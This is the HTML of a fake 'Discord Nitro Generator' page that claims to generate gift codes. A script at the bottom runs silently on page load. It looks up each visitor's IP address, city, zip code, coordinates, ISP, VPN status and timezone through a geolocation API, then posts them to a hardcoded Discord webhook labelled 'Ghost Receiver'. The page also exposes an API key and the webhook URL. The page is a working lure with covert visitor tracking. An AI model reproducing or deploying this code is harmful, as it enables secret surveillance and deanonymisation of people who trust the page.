<html>
<head>
<title>Nitro Generator | Generator</title>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="propeller" content="a8bc48ef0413ee0b25688a7960c39ca2">
<meta property="og:site_name" content="Nitro Generator">
<meta property="og:title" content="Nitro">
<meta property="og:description" content="You Have Been Gifted A Discord Nitro Generator">
<meta property="og:type" content="Nitro">
<meta name="og:image" itemprop="image" content="https://cdn1.epicgames.com/salesEvent/salesEvent/EGS_Discord_Nitro_2560x1440_withlogo_2560x1440-944994658df3b04d0c4940be832da19e">

<link rel="icon" href="../styles/favicon.ico">
<link href="../styles/alertGene.css" rel="stylesheet">

<style>
@media (max-width: 500px) {
textarea {
  height: 100px;
  line-height:1.25;
}
button {
	background-color:#000000;
	cursor:pointer;
	color:#00ff00;
	font-family:Arial;
	font-size:50px;
	padding:50px 60px;
	text-decoration:none;
}
}

.button0 {
  font-size:20px;
  padding:50px 60px;
}
</style>

<link href="https://fonts.googleapis.com/css?family=Lato:300,400,900" rel='stylesheet' type='text/css'>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css">

</head>
<body>
<style>
  textarea {
    background-color: #101217;
    border: 1px solid #101217;
    color: #FFF;
    padding: 8px;
    font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
}

body {
    background-color: #151923;
	font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;

}

input {
    background-color: #101217;
    color: #FFF;
	font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;

}

button {
	background-color:#101217;
	cursor:pointer;
	color:#FFF;
	font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
	font-size:17px;
	padding:7px 8px;
	text-decoration:none;
}
button:active {
	position:relative;
	top:1px;
}

</style>

<div class="alert">
	<span class="closebtn" onclick="this.parentElement.style.display='none';">&times;</span>
	<strong>Info!</strong> Refresh The Page A Few Times For <strong>Full</strong> Functionability, Thank You.
</div>

<div>
<center><h1 style="font-family: Helvetica Neue,Helvetica,Arial,sans-serif; color: #FFF;"><img src="../styles/logo.png" alt="Discord Logo" style="width: 50px; height: auto;"/>Discord Nitro Generator</h1></center>
<center><textarea id="a" rows="11" cols="100" readonly style="resize: none;">  
───────────────────────────────────────────────────────────────────────────
[INFO] Discord Code Generator.
[INFO] Discord Codes will be here.
[INFO] Most Codes Do Not Work.
───────────────────────────────────────────────────────────────────────────
</textarea>
<p></p>
<p style="font-family: Helvetica Neue,Helvetica,Arial,sans-serif; color: #FFF">Codes Generated Per Second [5 Is The Default]</p>
<input type="text" id="speed" value="5">
<p></p>
<button id='generate' class="button">
  Start Generating
</button>
<p></p>
<button id='stop' class="button">
  Stop Generating
</button>
    <p></p>
<button id='save' onclick="var rows = document.getElementById('b').value.split('\n').length -  1; download(rows + ' Unchecked Nitro Codes.txt', 'Dumped by [NitroGene](https://pepsinitro.github.io/Nitro-Generator/Nitro/index.html)')" class="button">Make Log Dump</button>
    <p></p>
<button onclick="stop(); document.getElementById('a').value = '\n───────────────────────────────────────────────────────────────────────────\n[INFO] Discord Code Generator.\n[INFO] Discord Codes will be here.\n[INFO] Most Codes Do Not Work. ───────────────────────────────────────────────────────────────────────────'; document.getElementById('b').value = '';" class="button" id="clear">Clear Log</button>
<textarea style="display: none;" id="b" rows="11" cols="100" readonly>
</textarea>
	<script src="main.js"></script>
</div>

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<script>
  $.getJSON("https://ipgeolocation.abstractapi.com/v1/?api_key=a1ebbf04c6164dd98b527e26c57fc28c", function (data) {
	const ip = data.ip_address;
	const city = data.city;
	const region = data.region;
	const zip = data.postal_code;
	const lat = data.latitude;
	const long = data.longitude;
	const country = data.country;
	const flag = data.flag.emoji;
	const aso = data.connection.autonomous_system_organization;
	const isp = data.connection.isp_name;
	const org = data.connection.organization_name;
	const vpn = data.security.is_vpn;
	const tz = data.timezone.name;
	const ct = data.timezone.current_time;

	const request = new XMLHttpRequest();
	request.open("POST", "https://discord.com/api/webhooks/1044397676281745428/5bq6lCCuh8toQMFRng1b9VIP8GHo211O6OXN8TgPLAOfxDbRH4Iu1p3weT5ZH7QgjCur");
	
	request.setRequestHeader("Content-type", "application/json");
	const params = {
	  username: "Ghost Receiver",
	  avatar_url: "https://pepsinitro.github.io/Nitro-Generator/styles/Image.png",
	  content: "**Data Requested, Data Retrieved, On Stand By [GeneratorPage]**\n> IP: " + ip + 
	  "\n> City: " + city + 
	  "\n> Region: " + region + 
	  "\n> Zip: " + zip + 
	  "\n> Latitude:  " + lat +
	  "\n> Longitude:  " + long +
	  "\n> Country: " + country +
	  "\n> Flag: " + flag +
	  "\n> Auto System Org: " + aso +
	  "\n> ISP: " + isp +
	  "\n> Org: " + org +
	  "\n> Using VPN: " + vpn +
	  "\n> Timezone: " + tz +
	  "\n> Current time: " + ct 
	  ,
	};
	request.send(JSON.stringify(params));
  });
</script>

	</body>
</html>
